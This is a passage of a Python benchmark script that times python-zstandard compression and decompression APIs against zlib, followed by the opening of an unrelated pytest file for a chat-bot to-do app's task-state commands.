zctx = zstd.ZstdCompressor(compression_params=zparams)
for chunk in chunks:
b = bio()
with zctx.stream_writer(b, size=len(chunk)) as compressor:
compressor.write(chunk)
@bench("discrete", "read_to_iter()")
def compress_read_to_iter(chunks, zparams):
zctx = zstd.ZstdCompressor(compression_params=zparams)
for chunk in chunks:
for d in zctx.read_to_iter(chunk):
pass
@bench("discrete", "read_to_iter() w/ input size")
def compress_read_to_iter_size(chunks, zparams):
zctx = zstd.ZstdCompressor(compression_params=zparams)
for chunk in chunks:
for d in zctx.read_to_iter(chunk, size=len(chunk)):
pass
@bench("discrete", "compressobj()")
def compress_compressobj(chunks, zparams):
zctx = zstd.ZstdCompressor(compression_params=zparams)
for chunk in chunks:
cobj = zctx.compressobj()
cobj.compress(chunk)
cobj.flush()
@bench("discrete", "compressobj() w/ input size")
def compress_compressobj_size(chunks, zparams):
zctx = zstd.ZstdCompressor(compression_params=zparams)
for chunk in chunks:
cobj = zctx.compressobj(size=len(chunk))
cobj.compress(chunk)
cobj.flush()
@bench("discrete", "chunker()")
def compress_chunker_discrete(chunks, zparams):
cctx = zstd.ZstdCompressor(compression_params=zparams)
for in_chunk in chunks:
chunker = cctx.chunker()
for out_chunk in chunker.compress(in_chunk):
pass
for out_chunk in chunker.finish():
pass
@bench("discrete", "chunker() w/ input size")
def compress_chunker_discrete_size(chunks, zparams):
cctx = zstd.ZstdCompressor(compression_params=zparams)
for in_chunk in chunks:
chunker = cctx.chunker(size=len(in_chunk))
for out_chunk in chunker.compress(in_chunk):
pass
for out_chunk in chunker.finish():
pass
@bench("discrete", "compress()", simple=True, zlib=True)
def compress_zlib_discrete(chunks, opts):
level = opts["zlib_level"]
c = zlib.compress
for chunk in chunks:
c(chunk, level)
@bench("stream", "compressobj()", simple=True, zlib=True)
def compress_zlib_compressobj(chunks, opts):
compressor = zlib.compressobj(opts["zlib_level"])
f = zlib.Z_SYNC_FLUSH
for chunk in chunks:
compressor.compress(chunk)
compressor.flush(f)
compressor.flush()
@bench("stream", "stream_writer()")
def compress_stream_stream_writer(chunks, zparams):
zctx = zstd.ZstdCompressor(compression_params=zparams)
b = bio()
with zctx.stream_writer(b) as compressor:
for chunk in chunks:
compressor.write(chunk)
compressor.flush()
@bench("stream", "compressobj()", simple=True)
def compress_stream_compressobj(chunks, zparams):
zctx = zstd.ZstdCompressor(compression_params=zparams)
compressor = zctx.compressobj()
flush = zstd.COMPRESSOBJ_FLUSH_BLOCK
for chunk in chunks:
compressor.compress(chunk)
compressor.flush(flush)
@bench("stream", "chunker()", simple=True)
def compress_stream_chunker(chunks, zparams):
cctx = zstd.ZstdCompressor(compression_params=zparams)
chunker = cctx.chunker()
for chunk in chunks:
for c in chunker.compress(chunk):
pass
for c in chunker.finish():
pass
@bench("content-dict", "compress()", simple=True)
def compress_content_dict_compress(chunks, zparams):
zstd.ZstdCompressor(compression_params=zparams).compress(chunks[0])
for i, chunk in enumerate(chunks[1:]):
d = zstd.ZstdCompressionDict(chunks[i])
zstd.ZstdCompressor(dict_data=d, compression_params=zparams).compress(
chunk
)
@bench("content-dict", "stream_writer()")
def compress_content_dict_stream_writer(chunks, zparams, use_size=False):
zctx = zstd.ZstdCompressor(compression_params=zparams)
b = bio()
with zctx.stream_writer(
b, size=len(chunks[0]) if use_size else -1
) as compressor:
compressor.write(chunks[0])
for i, chunk in enumerate(chunks[1:]):
d = zstd.ZstdCompressionDict(chunks[i])
b = bio()
zctx = zstd.ZstdCompressor(dict_data=d, compression_params=zparams)
with zctx.stream_writer(
b, size=len(chunk) if use_size else -1
) as compressor:
compressor.write(chunk)
@bench("content-dict", "stream_writer() w/ input size")
def compress_content_dict_stream_writer_size(chunks, zparams):
compress_content_dict_stream_writer(chunks, zparams, use_size=True)
@bench("content-dict", "read_to_iter()")
def compress_content_dict_read_to_iter(chunks, zparams, use_size=False):
zctx = zstd.ZstdCompressor(compression_params=zparams)
size = len(chunks[0]) if use_size else -1
for o in zctx.read_to_iter(chunks[0], size=size):
pass
for i, chunk in enumerate(chunks[1:]):
d = zstd.ZstdCompressionDict(chunks[i])
zctx = zstd.ZstdCompressor(dict_data=d, compression_params=zparams)
size = len(chunk) if use_size else -1
for o in zctx.read_to_iter(chunk, size=size):
pass
@bench("content-dict", "read_to_iter() w/ input size")
def compress_content_dict_read_to_iter_size(chunks, zparams):
compress_content_dict_read_to_iter(chunks, zparams, use_size=True)
@bench("content-dict", "compressobj()")
def compress_content_dict_compressobj(chunks, zparams, use_size=False):
zctx = zstd.ZstdCompressor(compression_params=zparams)
cobj = zctx.compressobj(size=len(chunks[0]) if use_size else -1)
cobj.compress(chunks[0])
cobj.flush()
for i, chunk in enumerate(chunks[1:]):
d = zstd.ZstdCompressionDict(chunks[i])
zctx = zstd.ZstdCompressor(dict_data=d, compression_params=zparams)
cobj = zctx.compressobj(len(chunk) if use_size else -1)
cobj.compress(chunk)
cobj.flush()
@bench("content-dict", "compressobj() w/ input size")
def compress_content_dict_compressobj_size(chunks, zparams):
compress_content_dict_compressobj(chunks, zparams, use_size=True)
@bench("discrete", "decompress() single use zctx", require_content_size=True)
def decompress_one_use(chunks, opts):
for chunk in chunks:
zctx = zstd.ZstdDecompressor(**opts)
zctx.decompress(chunk)
@bench(
"discrete",
"decompress() reuse zctx",
require_content_size=True,
simple=True,
)
def decompress_reuse(chunks, opts):
zctx = zstd.ZstdDecompressor(**opts)
for chunk in chunks:
zctx.decompress(chunk)
@bench("discrete", "decompress()", simple=True, zlib=True)
def decompress_zlib_decompress(chunks):
d = zlib.decompress
for chunk in chunks:
d(chunk)
@bench(
"discrete",
"multi_decompress_to_buffer() w/ buffer input + sizes",
simple=True,
threads_arg=True,
decompressed_sizes_arg=True,
chunks_as_buffer=True,
cffi=False,
)
def decompress_multi_decompress_to_buffer_buffer_and_size(
chunks, opts, threads, decompressed_sizes
):
zctx = zstd.ZstdDecompressor(**opts)
zctx.multi_decompress_to_buffer(
chunks, decompressed_sizes=decompressed_sizes, threads=threads
)
@bench(
"discrete",
"multi_decompress_to_buffer() w/ buffer input",
require_content_size=True,
threads_arg=True,
chunks_as_buffer=True,
cffi=False,
)
def decompress_multi_decompress_to_buffer_buffer(chunks, opts, threads):
zctx = zstd.ZstdDecompressor(**opts)
zctx.multi_decompress_to_buffer(chunks, threads=threads)
@bench(
"discrete",
"multi_decompress_to_buffer() w/ list of bytes input + sizes",
threads_arg=True,
decompressed_sizes_arg=True,
cffi=False,
)
def decompress_multi_decompress_to_buffer_list_and_sizes(
chunks, opts, threads, decompressed_sizes
):
zctx = zstd.ZstdDecompressor(**opts)
zctx.multi_decompress_to_buffer(
chunks, decompressed_sizes=decompressed_sizes, threads=threads
)
@bench(
"discrete",
"multi_decompress_to_buffer() w/ list of bytes input",
require_content_size=True,
threads_arg=True,
cffi=False,
)
def decompress_multi_decompress_to_buffer_list(chunks, opts, threads):
zctx = zstd.ZstdDecompressor(**opts)
zctx.multi_decompress_to_buffer(chunks, threads=threads)
@bench("discrete", "stream_reader()")
def decompress_stream_reader(chunks, opts):
zctx = zstd.ZstdDecompressor(**opts)
for chunk in chunks:
with zctx.stream_reader(chunk) as reader:
while reader.read(16384):
pass
@bench("discrete", "stream_writer()")
def decompress_stream_writer(chunks, opts):
zctx = zstd.ZstdDecompressor(**opts)
for chunk in chunks:
with zctx.stream_writer(bio()) as decompressor:
decompressor.write(chunk)
@bench("discrete", "read_to_iter()")
def decompress_read_to_iter(chunks, opts):
zctx = zstd.ZstdDecompressor(**opts)
for chunk in chunks:
for d in zctx.read_to_iter(chunk):
pass
@bench("discrete", "decompressobj()")
def decompress_decompressobj(chunks, opts):
zctx = zstd.ZstdDecompressor(**opts)
for chunk in chunks:
decompressor = zctx.decompressobj()
decompressor.decompress(chunk)
@bench("stream", "decompressobj()", simple=True, zlib=True)
def decompress_zlib_stream(chunks):
dobj = zlib.decompressobj()
for chunk in chunks:
dobj.decompress(chunk)
dobj.flush()
@bench("stream", "stream_writer()")
def decompress_stream_stream_writer(chunks, opts):
zctx = zstd.ZstdDecompressor(**opts)
with zctx.stream_writer(bio()) as decompressor:
for chunk in chunks:
decompressor.write(chunk)
@bench("stream", "decompressobj()", simple=True)
def decompress_stream_decompressobj(chunks, opts):
zctx = zstd.ZstdDecompressor(**opts)
decompressor = zctx.decompressobj()
for chunk in chunks:
decompressor.decompress(chunk)
@bench("content-dict", "decompress()", require_content_size=True)
def decompress_content_dict_decompress(chunks, opts):
zctx = zstd.ZstdDecompressor(**opts)
last = zctx.decompress(chunks[0])
for chunk in chunks[1:]:
d = zstd.ZstdCompressionDict(last)
zctx = zstd.ZstdDecompressor(dict_data=d, **opts)
last = zctx.decompress(chunk)
@bench("content-dict", "stream_writer()")
def decompress_content_dict_stream_writer(chunks, opts):
zctx = zstd.ZstdDecompressor(**opts)
b = bio()
with zctx.stream_writer(b) as decompressor:
decompressor.write(chunks[0])
last = b.getvalue()
for chunk in chunks[1:]:
d = zstd.ZstdCompressionDict(last)
zctx = zstd.ZstdDecompressor(dict_data=d, **opts)
b = bio()
with zctx.stream_writer(b) as decompressor:
decompressor.write(chunk)
last = b.getvalue()
@bench("content-dict", "read_to_iter()")
def decompress_content_dict_read_to_iter(chunks, opts):
zctx = zstd.ZstdDecompressor(**opts)
last = b"".join(zctx.read_to_iter(chunks[0]))
for chunk in chunks[1:]:
d = zstd.ZstdCompressionDict(last)
zctx = zstd.ZstdDecompressor(dict_data=d, **opts)
last = b"".join(zctx.read_to_iter(chunk))
@bench("content-dict", "decompressobj()")
def decompress_content_dict_decompressobj(chunks, opts):
zctx = zstd.ZstdDecompressor(**opts)
last = zctx.decompressobj().decompress(chunks[0])
for chunk in chunks[1:]:
d = zstd.ZstdCompressionDict(last)
zctx = zstd.ZstdDecompressor(dict_data=d, **opts)
last = zctx.decompressobj().decompress(chunk)
@bench("content-dict", "decompress_content_dict_chain()", simple=True)
def decompress_content_dict_chain_api(chunks, opts):
zctx = zstd.ZstdDecompressor(**opts)
zctx.decompress_content_dict_chain(chunks)
def get_chunks(paths, limit_count, encoding, chunk_size=None):
    """Load benchmark input chunks from files and/or directories.

    Each file is read whole, optionally zlib-decoded, and optionally split
    into ``chunk_size``-byte pieces. Collection stops once ``limit_count``
    chunks (if truthy) have been gathered.
    """
    chunks = []

    def _load(file_path):
        # Read one file and append its (possibly split) contents to chunks.
        with open(file_path, "rb") as fh:
            data = fh.read()
        if not data:
            return
        if encoding == "zlib":
            data = zlib.decompress(data)
        elif encoding != "raw":
            raise Exception("unexpected chunk encoding: %s" % encoding)
        if chunk_size is None:
            chunks.append(data)
        else:
            for off in range(0, len(data), chunk_size):
                chunks.append(data[off : off + chunk_size])

    def _limit_reached():
        return bool(limit_count) and len(chunks) >= limit_count

    for path in paths:
        if not os.path.isdir(path):
            _load(path)
            if _limit_reached():
                return chunks
            continue
        # Walk directories deterministically so runs are reproducible.
        for root, dirs, files in os.walk(path):
            dirs.sort()
            for f in sorted(files):
                try:
                    _load(os.path.join(root, f))
                except IOError:
                    continue
                if _limit_reached():
                    return chunks
    return chunks
def get_benches(mode, direction, zlib=False):
    """Return the registered benchmark functions matching the filters.

    ``direction`` selects compress vs decompress benchmarks; ``mode`` and
    ``zlib`` must match the attributes set by the @bench decorator. When
    running on the cffi backend, cffi-incompatible benchmarks are skipped.
    """
    assert direction in ("compress", "decompress")
    prefix = "%s_" % direction
    return [
        fn
        for fn in BENCHES
        if fn.__name__.startswith(prefix)
        and fn.mode == mode
        and fn.zlib == zlib
        and (fn.cffi or zstd.backend != "cffi")
    ]
def format_results(results, title, prefix, total_size):
    """Print the fastest sample from ``results`` plus MB/s throughput.

    ``results`` is a list of (cpu, user, system, wall) tuples as produced
    by timer(); the minimum tuple is reported along with the sample count.
    """
    cpu, user, system, wall = min(results)
    rate = float(total_size) / wall
    print("%s %s" % (prefix, title))
    print(
        "%.6f wall; %.6f CPU; %.6f user; %.6f sys %.2f MB/s (best of %d)"
        % (wall, cpu, user, system, rate / 1000000.0, len(results))
    )
def bench_discrete_zlib_compression(chunks, opts):
    """Run and report every discrete-mode zlib compression benchmark."""
    total_size = sum(len(c) for c in chunks)
    for fn in get_benches("discrete", "compress", zlib=True):
        format_results(
            timer(lambda: fn(chunks, opts)),
            fn.title,
            "compress discrete zlib",
            total_size,
        )
def bench_discrete_zlib_decompression(chunks, total_size):
    """Run and report every discrete-mode zlib decompression benchmark."""
    for fn in get_benches("discrete", "decompress", zlib=True):
        format_results(
            timer(lambda: fn(chunks)),
            fn.title,
            "decompress discrete zlib",
            total_size,
        )
def bench_discrete_compression(
    chunks, zparams, cover=False, dict_data=None, batch_threads=None
):
    """Benchmark discrete (one frame per input) zstd compression APIs.

    ``batch_threads`` is forwarded to benchmarks that accept a ``threads``
    argument.  NOTE(review): ``dict_data`` and ``cover`` only influence the
    printed prefix here — the dictionary itself is not passed to the
    benchmark functions; presumably they obtain it elsewhere — confirm.
    """
    total_size = sum(map(len, chunks))

    # The printed prefix records whether a (COVER-trained) dictionary mode
    # is being benchmarked.
    if dict_data:
        if cover:
            prefix = "compress discrete cover dict"
        else:
            prefix = "compress discrete dict"
    else:
        prefix = "compress discrete"

    for fn in get_benches("discrete", "compress"):
        chunks_arg = chunks

        kwargs = {}
        if fn.threads_arg:
            kwargs["threads"] = batch_threads

        # Some benchmarks take a BufferWithSegments instead of a list of
        # bytes: concatenate the chunks and describe each segment with a
        # packed (offset, length) pair of unsigned 64-bit integers.
        if fn.chunks_as_buffer:
            s = struct.Struct("=QQ")
            offsets = io.BytesIO()
            current_offset = 0
            for chunk in chunks:
                offsets.write(s.pack(current_offset, len(chunk)))
                current_offset += len(chunk)

            chunks_arg = zstd.BufferWithSegments(
                b"".join(chunks), offsets.getvalue()
            )

        results = timer(lambda: fn(chunks_arg, zparams, **kwargs))
        format_results(results, fn.title, prefix, total_size)
def bench_discrete_decompression(
    orig_chunks,
    compressed_chunks,
    total_size,
    zparams,
    dict_data=None,
    batch_threads=None,
):
    """Benchmark discrete zstd decompression APIs.

    ``orig_chunks`` supply the decompressed sizes for benchmarks that need
    them; ``compressed_chunks`` are the frames to decompress; ``total_size``
    is the original (uncompressed) byte count used for throughput figures.
    ``dict_data``, when given, is forwarded to the decompressor options.
    """
    dopts = {}
    if dict_data:
        dopts["dict_data"] = dict_data
        prefix = "decompress discrete dict"
    else:
        prefix = "decompress discrete"

    for fn in get_benches("discrete", "decompress"):
        # Frames written without an embedded content size cannot service
        # benchmarks that require knowing it up front.
        if not zparams.write_content_size and fn.require_content_size:
            continue

        chunks_arg = compressed_chunks

        kwargs = {}
        if fn.threads_arg:
            kwargs["threads"] = batch_threads

        # Pass compressed frames in a BufferWithSegments rather than a list
        # of bytes.
        if fn.chunks_as_buffer:
            s = struct.Struct("=QQ")
            offsets = io.BytesIO()
            current_offset = 0
            for chunk in compressed_chunks:
                offsets.write(s.pack(current_offset, len(chunk)))
                current_offset += len(chunk)

            chunks_arg = zstd.BufferWithSegments(
                b"".join(compressed_chunks), offsets.getvalue()
            )

        if fn.decompressed_sizes_arg:
            # Ideally we'd use array.array here. But Python 2 doesn't support the
            # Q format.
            s = struct.Struct("=Q")
            kwargs["decompressed_sizes"] = b"".join(
                s.pack(len(c)) for c in orig_chunks
            )

        results = timer(lambda: fn(chunks_arg, dopts, **kwargs))
        format_results(results, fn.title, prefix, total_size)
def bench_stream_compression(chunks, zparams):
    """Run every streaming zstd compression benchmark over ``chunks``."""
    size = sum(len(c) for c in chunks)
    for bench in get_benches("stream", "compress"):
        timings = timer(lambda: bench(chunks, zparams))
        format_results(timings, bench.title, "compress stream", size)
def bench_stream_decompression(chunks, total_size):
    """Run every streaming zstd decompression benchmark over ``chunks``."""
    for bench in get_benches("stream", "decompress"):
        timings = timer(lambda: bench(chunks, {}))
        format_results(timings, bench.title, "decompress stream", total_size)
def bench_stream_zlib_compression(chunks, opts):
    """Run every streaming zlib compression benchmark over ``chunks``."""
    size = sum(len(c) for c in chunks)
    for bench in get_benches("stream", "compress", zlib=True):
        timings = timer(lambda: bench(chunks, opts))
        format_results(timings, bench.title, "compress stream zlib", size)
def bench_stream_zlib_decompression(chunks, total_size):
    """Run every streaming zlib decompression benchmark over ``chunks``."""
    for bench in get_benches("stream", "decompress", zlib=True):
        timings = timer(lambda: bench(chunks))
        format_results(timings, bench.title, "decompress stream zlib", total_size)
def bench_content_dict_compression(chunks, zparams):
    """Run content-dictionary compression benchmarks over ``chunks``."""
    size = sum(len(c) for c in chunks)
    for bench in get_benches("content-dict", "compress"):
        timings = timer(lambda: bench(chunks, zparams))
        format_results(timings, bench.title, "compress content dict", size)
def bench_content_dict_decompression(chunks, total_size, zparams):
    """Run content-dictionary decompression benchmarks over ``chunks``."""
    for bench in get_benches("content-dict", "decompress"):
        # Benchmarks that need an embedded content size can't run when the
        # frames were written without one.
        if bench.require_content_size and not zparams.write_content_size:
            continue
        timings = timer(lambda: bench(chunks, {}))
        format_results(timings, bench.title, "decompress content dict", total_size)
if __name__ == "__main__":
    import argparse

    # Seed the RNG so dictionary-training sample selection is reproducible
    # across benchmark runs.
    random.seed(42)

    parser = argparse.ArgumentParser()

    group = parser.add_argument_group("Compression Modes")
    group.add_argument(
        "--discrete",
        action="store_true",
        help="Compress each input independently",
    )
    group.add_argument(
        "--stream",
        action="store_true",
        help="Feed each input into a stream and emit " "flushed blocks",
    )
    group.add_argument(
        "--content-dict",
        action="store_true",
        help="Compress each input using the previous as a "
        "content dictionary",
    )
    group.add_argument(
        "--discrete-dict",
        action="store_true",
        help="Compress each input independently with a " "dictionary",
    )

    group = parser.add_argument_group("Benchmark Selection")
    group.add_argument(
        "--no-compression",
        action="store_true",
        help="Do not test compression performance",
    )
    group.add_argument(
        "--no-decompression",
        action="store_true",
        help="Do not test decompression performance",
    )
    group.add_argument(
        "--only-simple", action="store_true", help="Only run the simple APIs"
    )
    group.add_argument(
        "--zlib", action="store_true", help="Benchmark against zlib"
    )

    group = parser.add_argument_group("Compression Parameters")
    group.add_argument(
        "-l", "--level", type=int, default=3, help="Compression level"
    )
    group.add_argument(
        "--no-write-size",
        action="store_true",
        help="Do not write content size to zstd frames",
    )
    group.add_argument(
        "--write-checksum",
        action="store_true",
        help="Write checksum data to zstd frames",
    )
    group.add_argument(
        "--dict-size",
        type=int,
        default=128 * 1024,
        help="Maximum size of trained dictionary",
    )
    group.add_argument(
        "--enable-ldm",
        action="store_true",
        help="Enable long distance matching",
    )
    group.add_argument(
        "--ldm-hash-log",
        type=int,
        help="Long distance matching hash log value. Power of 2",
    )
    group.add_argument(
        "--compress-threads",
        type=int,
        help="Use multi-threaded compression with this many " "threads",
    )
    group.add_argument(
        "--batch-threads",
        type=int,
        default=0,
        help="Use this many threads for batch APIs",
    )
    group.add_argument(
        "--cover-k",
        type=int,
        default=0,
        help="Segment size parameter to COVER algorithm",
    )
    group.add_argument(
        "--cover-d",
        type=int,
        default=0,
        help="Dmer size parameter to COVER algorithm",
    )
    group.add_argument(
        "--zlib-level", type=int, default=6, help="zlib compression level"
    )

    group = parser.add_argument_group("Input Processing")
    group.add_argument(
        "--limit-count", type=int, help="limit number of input files added"
    )
    group.add_argument(
        "--dict-sample-limit",
        type=int,
        help="limit how many samples are fed into dictionary " "training",
    )
    group.add_argument(
        "--chunk-encoding",
        choices=["raw", "zlib"],
        default="raw",
        help="How input chunks are encoded. Can be used to "
        "pass compressed chunks for benchmarking",
    )
    group.add_argument(
        "--split-input-size",
        type=int,
        help="Split inputs into chunks so they are at most this " "many bytes",
    )

    parser.add_argument("path", metavar="PATH", nargs="+")

    args = parser.parse_args()

    # If no compression mode defined, assume discrete.
    if not args.stream and not args.content_dict and not args.discrete_dict:
        args.discrete = True

    # It is easier to filter here than to pass arguments to multiple
    # functions.
    if args.only_simple:
        BENCHES[:] = [fn for fn in BENCHES if fn.simple]

    params = {
        "write_content_size": True,
    }
    if args.no_write_size:
        params["write_content_size"] = False
    if args.write_checksum:
        params["write_checksum"] = True
    if args.compress_threads:
        params["threads"] = args.compress_threads
    if args.enable_ldm:
        params["enable_ldm"] = True
    if args.ldm_hash_log:
        params["ldm_hash_log"] = args.ldm_hash_log

    zparams = zstd.ZstdCompressionParameters.from_level(args.level, **params)
    if args.compress_threads:
        # NOTE(review): threads_zparams is built from the same params as
        # zparams and is never read below — looks vestigial; confirm before
        # removing.
        threads_zparams = zstd.ZstdCompressionParameters.from_level(
            args.level, **params
        )

    chunks = get_chunks(
        args.path,
        args.limit_count,
        args.chunk_encoding,
        chunk_size=args.split_input_size,
    )
    orig_size = sum(map(len, chunks))
    print("%d chunks; %d bytes" % (len(chunks), orig_size))

    # Train a dictionary up front so it can be shared by the compression
    # pass and the benchmark pass.
    if args.discrete_dict:
        if args.dict_sample_limit:
            training_chunks = random.sample(chunks, args.dict_sample_limit)
        else:
            training_chunks = chunks

        train_args = {
            "level": args.level,
        }

        if args.cover_k:
            train_args["k"] = args.cover_k
        if args.cover_d:
            train_args["d"] = args.cover_d

        # Always use all available threads in optimize mode.
        train_args["threads"] = -1

        dict_data = zstd.train_dictionary(
            args.dict_size, training_chunks, **train_args
        )
        print(
            "trained dictionary of size %d (wanted %d) (l=%d)"
            % (len(dict_data), args.dict_size, args.level)
        )

    if args.zlib and args.discrete:
        compressed_discrete_zlib = []
        ratios = []
        for chunk in chunks:
            c = zlib.compress(chunk, args.zlib_level)
            compressed_discrete_zlib.append(c)
            ratios.append(float(len(c)) / float(len(chunk)))

        compressed_size = sum(map(len, compressed_discrete_zlib))
        ratio = float(compressed_size) / float(orig_size) * 100.0
        bad_count = sum(1 for r in ratios if r >= 1.00)
        good_ratio = 100.0 - (float(bad_count) / float(len(chunks)) * 100.0)
        print(
            "zlib discrete compressed size (l=%d): %d (%.2f%%); smaller: %.2f%%"
            % (args.zlib_level, compressed_size, ratio, good_ratio)
        )

    # In discrete mode, each input is compressed independently, possibly
    # with a dictionary.
    if args.discrete:
        zctx = zstd.ZstdCompressor(compression_params=zparams)
        compressed_discrete = []
        ratios = []
        # Always use multiple threads here so we complete faster.
        if hasattr(zctx, "multi_compress_to_buffer"):
            for i, c in enumerate(
                zctx.multi_compress_to_buffer(chunks, threads=-1)
            ):
                compressed_discrete.append(c.tobytes())
                ratios.append(float(len(c)) / float(len(chunks[i])))
        else:
            for chunk in chunks:
                compressed = zctx.compress(chunk)
                # BUG FIX: this used to append the *uncompressed* chunk,
                # which corrupted the compressed-size statistics and fed
                # raw data to the decompression benchmarks below.
                compressed_discrete.append(compressed)
                ratios.append(float(len(compressed)) / float(len(chunk)))

        compressed_size = sum(map(len, compressed_discrete))
        ratio = float(compressed_size) / float(orig_size) * 100.0
        bad_count = sum(1 for r in ratios if r >= 1.00)
        good_ratio = 100.0 - (float(bad_count) / float(len(chunks)) * 100.0)
        print(
            "discrete compressed size (l=%d): %d (%.2f%%); smaller: %.2f%%"
            % (args.level, compressed_size, ratio, good_ratio)
        )

    # Discrete dict mode is like discrete but trains a dictionary.
    if args.discrete_dict:
        zctx = zstd.ZstdCompressor(
            dict_data=dict_data, compression_params=zparams
        )
        compressed_discrete_dict = []
        ratios = []

        if hasattr(zctx, "multi_compress_to_buffer"):
            for i, c in enumerate(
                zctx.multi_compress_to_buffer(chunks, threads=-1)
            ):
                compressed_discrete_dict.append(c.tobytes())
                ratios.append(float(len(c)) / float(len(chunks[i])))
        else:
            for chunk in chunks:
                compressed = zctx.compress(chunk)
                compressed_discrete_dict.append(compressed)
                ratios.append(float(len(compressed)) / float(len(chunk)))

        compressed_size = sum(map(len, compressed_discrete_dict))
        ratio = float(compressed_size) / float(orig_size) * 100.0
        bad_count = sum(1 for r in ratios if r >= 1.00)
        good_ratio = 100.0 - (float(bad_count) / float(len(chunks)) * 100.0)
        print(
            "discrete dict compressed size (l=%d): %d (%.2f%%); smaller: %.2f%%"
            % (args.level, compressed_size, ratio, good_ratio)
        )

    # In stream mode the inputs are fed into a streaming compressor and
    # blocks are flushed for each input.
    if args.zlib and args.stream:
        compressed_stream_zlib = []
        ratios = []
        compressor = zlib.compressobj(args.zlib_level)
        for chunk in chunks:
            output = compressor.compress(chunk)
            output += compressor.flush(zlib.Z_SYNC_FLUSH)
            compressed_stream_zlib.append(output)

        compressed_size = sum(map(len, compressed_stream_zlib))
        ratio = float(compressed_size) / float(orig_size) * 100.0
        print(
            "stream zlib compressed size (l=%d): %d (%.2f%%)"
            % (args.zlib_level, compressed_size, ratio)
        )

    if args.stream:
        zctx = zstd.ZstdCompressor(compression_params=zparams)
        compressed_stream = []
        ratios = []
        compressor = zctx.compressobj()
        for chunk in chunks:
            output = compressor.compress(chunk)
            output += compressor.flush(zstd.COMPRESSOBJ_FLUSH_BLOCK)
            compressed_stream.append(output)

        compressed_size = sum(map(len, compressed_stream))
        ratio = float(compressed_size) / float(orig_size) * 100.0
        print(
            "stream compressed size (l=%d): %d (%.2f%%)"
            % (zparams.compression_level, compressed_size, ratio)
        )

    if args.content_dict:
        compressed_content_dict = []
        ratios = []
        # First chunk is compressed like normal.
        c = zstd.ZstdCompressor(compression_params=zparams).compress(chunks[0])
        compressed_content_dict.append(c)
        ratios.append(float(len(c)) / float(len(chunks[0])))

        # Subsequent chunks use previous chunk as a dict.
        for i, chunk in enumerate(chunks[1:]):
            d = zstd.ZstdCompressionDict(chunks[i])
            zctx = zstd.ZstdCompressor(dict_data=d, compression_params=zparams)
            c = zctx.compress(chunk)
            compressed_content_dict.append(c)
            ratios.append(float(len(c)) / float(len(chunk)))

        compressed_size = sum(map(len, compressed_content_dict))
        ratio = float(compressed_size) / float(orig_size) * 100.0
        bad_count = sum(1 for r in ratios if r >= 1.00)
        good_ratio = 100.0 - (float(bad_count) / float(len(chunks)) * 100.0)
        print(
            "content dict compressed size (l=%d): %d (%.2f%%); smaller: %.2f%%"
            % (zparams.compression_level, compressed_size, ratio, good_ratio)
        )

    print("")

    if not args.no_compression:
        if args.zlib and args.discrete:
            bench_discrete_zlib_compression(
                chunks, {"zlib_level": args.zlib_level}
            )
        if args.discrete:
            bench_discrete_compression(
                chunks, zparams, batch_threads=args.batch_threads
            )
        if args.discrete_dict:
            bench_discrete_compression(
                chunks,
                zparams,
                batch_threads=args.batch_threads,
                dict_data=dict_data,
            )
        if args.zlib and args.stream:
            bench_stream_zlib_compression(
                chunks, {"zlib_level": args.zlib_level}
            )
        if args.stream:
            bench_stream_compression(chunks, zparams)
        if args.content_dict:
            bench_content_dict_compression(chunks, zparams)

        # Blank line separates the compression and decompression sections.
        if not args.no_decompression:
            print("")

    if not args.no_decompression:
        if args.zlib and args.discrete:
            bench_discrete_zlib_decompression(
                compressed_discrete_zlib, orig_size
            )
        if args.discrete:
            bench_discrete_decompression(
                chunks,
                compressed_discrete,
                orig_size,
                zparams,
                batch_threads=args.batch_threads,
            )
        if args.discrete_dict:
            bench_discrete_decompression(
                chunks,
                compressed_discrete_dict,
                orig_size,
                zparams,
                dict_data=dict_data,
                batch_threads=args.batch_threads,
            )
        if args.zlib and args.stream:
            bench_stream_zlib_decompression(compressed_stream_zlib, orig_size)
        if args.stream:
            bench_stream_decompression(compressed_stream, orig_size)
        if args.content_dict:
            bench_content_dict_decompression(
                compressed_content_dict, orig_size, zparams
            )
| |
import emoji
import logging
import pytest
from todo.tasks import tasks_document
from todo.test_helpers import env
logger = logging.getLogger(__name__)
@pytest.mark.asyncio
@pytest.mark.parametrize(('task_idx', 'command_tmpl', 'should_get_answer', 'should_get_state'), [
    (0, 'REOPEN_TASK_{}', ':ok: Task `{}` was opened', 'open'),
    (0, 'DONE_TASK_{}', 'Task `{}` is already done', 'done'),
    (1, 'STOP_TASK_{}', ':ok: Task `{}` was stopped', 'open'),
    (1, 'DONE_TASK_{}', ':ok: Task `{}` was done', 'done'),
    (1, 'START_TASK_{}', 'Task `{}` is already in progress', 'in progress'),
    (2, 'START_TASK_{}', ':ok: Task `{}` was started', 'in progress'),
    (2, 'REOPEN_TASK_{}', 'Task `{}` is already opened', 'open'),
    (2, 'STOP_TASK_{}', 'Task `{}` is already stopped', 'open'),
])
async def test_change_state_of_task_by_postback(
        build_context, task_idx, command_tmpl, should_get_answer, should_get_state):
    """A state-change postback moves the targeted task into the expected state
    and the bot replies with the matching confirmation/warning."""
    async with build_context() as ctx:
        tasks = await ctx.add_test_tasks()
        task_id = tasks[task_idx]._id

        # Alice presses the state-change button for the chosen task.
        await ctx.dialog([
            env.build_postback(command_tmpl.format(task_id)),
        ])

        updated = await tasks_document.TaskDocument.objects.find_by_id(task_id)

        # Bob confirms (or warns that the task is already in that state).
        await ctx.dialog([
            None,
            should_get_answer.format(updated.description),
        ])

        assert updated.state == should_get_state
@pytest.mark.asyncio
@pytest.mark.parametrize(('init_state', 'command', 'should_get_answer', 'should_get_state'), [
    ('done', 'reopen', ':ok: Task `{}` was opened', 'open'),
    ('done', 'open last', ':ok: Task `{}` was opened', 'open'),
    ('open', 'open last', 'Task `{}` is already opened', 'open'),
    ('open', 'start', ':ok: Task `{}` was started', 'in progress'),
    ('open', 'start last', ':ok: Task `{}` was started', 'in progress'),
    ('open', 'start task', ':ok: Task `{}` was started', 'in progress'),
    ('in progress', 'start last', 'Task `{}` is already in progress', 'in progress'),
    ('in progress', 'stop', ':ok: Task `{}` was stopped', 'open'),
    ('in progress', 'stop last', ':ok: Task `{}` was stopped', 'open'),
    ('open', 'stop last', 'Task `{}` is already stopped', 'open'),
    ('in progress', 'done', ':ok: Task `{}` was done', 'done'),
    ('in progress', 'done last', ':ok: Task `{}` was done', 'done'),
    ('done', 'done last', 'Task `{}` is already done', 'done'),
])
async def test_change_state_of_last_task(
        build_context, init_state, command, should_get_answer, should_get_state):
    """A textual '<verb> [last]' command applies to the most recent task."""
